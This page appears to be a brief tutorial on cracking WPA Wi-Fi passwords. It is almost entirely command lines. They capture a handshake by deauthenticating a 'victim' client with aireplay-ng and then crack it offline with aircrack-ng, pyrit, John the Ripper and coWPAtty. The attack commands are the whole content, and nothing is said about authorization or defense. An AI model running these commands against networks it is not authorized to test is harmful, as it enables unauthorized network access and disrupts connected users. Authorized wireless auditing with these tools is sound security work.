• Home
  • How to Crack WPA Handshake with Different Tools
Crack WPA Password

How to Crack WPA Handshake with Different Tools

Crack WPA handshake nowadays can be easy or can take an eternity, here I will explain the tools and techniques used by professionals.

Capture WPA Handshake

airmon-ng start <INTERFACE> <channel>
airodump-ng -c <CHANNEL> --bssid <BSSID> -w <FILENAME> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon

Crack WPA Handshake Methods

Dictionary mode

Cracking WPA handshakes with a wordlist is the most common procedure

aircrack-ng -w <WORDLIST> <.CAP FILENAME>

Database mode

aircrack-ng -r <DB NAME> <.CAP FILENAME>

Cracking WPA with Pyrit

airmon-ng start <INTERFACE> <CHANNEL>
pyrit -r <INTERFACE> -o <FILENAME> stripLive
aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon

Dictionary mode

pyrit -r <.CAP FILENAME> -i <WORDLIST> -b <BSSID> attack_passthrough

Database mode

pyrit -i <WORDLIST> import_passwords
pyrit -e <ESSID> create_essid
pyrit batch
pyrit -r <.CAP FILENAME> -b <BSSID> attack_db

Cracking WPA with John the Ripper (JTR)

./john --wordlist=<WORDLIST> --rules --stdout | aircrack-ng -e <ESSID> -w - <.CAP FILENAME>

Cracking WPA with CoWPAtty

cowpatty -r <.CAP FILENAME> -f <WORDLIST> -s <ESSID>

John Cracker

2 Comments

Comments are closed.